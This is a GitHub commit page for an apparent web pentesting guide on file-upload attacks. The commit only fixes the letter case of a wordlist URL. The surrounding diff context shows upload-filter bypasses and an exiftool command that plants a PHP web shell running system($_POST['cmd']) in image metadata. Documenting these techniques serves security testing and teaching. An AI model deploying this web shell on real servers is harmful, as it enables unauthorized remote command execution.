Skip to content

Commit

Permalink
Merge pull request #897 from shad0w0lf/patch-1
Browse files Browse the repository at this point in the history
Update README.md
  • Loading branch information
carlospolop authored Jul 20, 2024
2 parents ad95e60 + 80e6aa2 commit c79ed6b
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion pentesting-web/file-upload/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -81,7 +81,7 @@ Other useful extensions:
### Bypass Content-Type, Magic Number, Compression & Resizing
* Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
* Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` or you could also **introduce the payload directly** in an image:\
Expand Down

0 comments on commit c79ed6b

Please sign in to comment.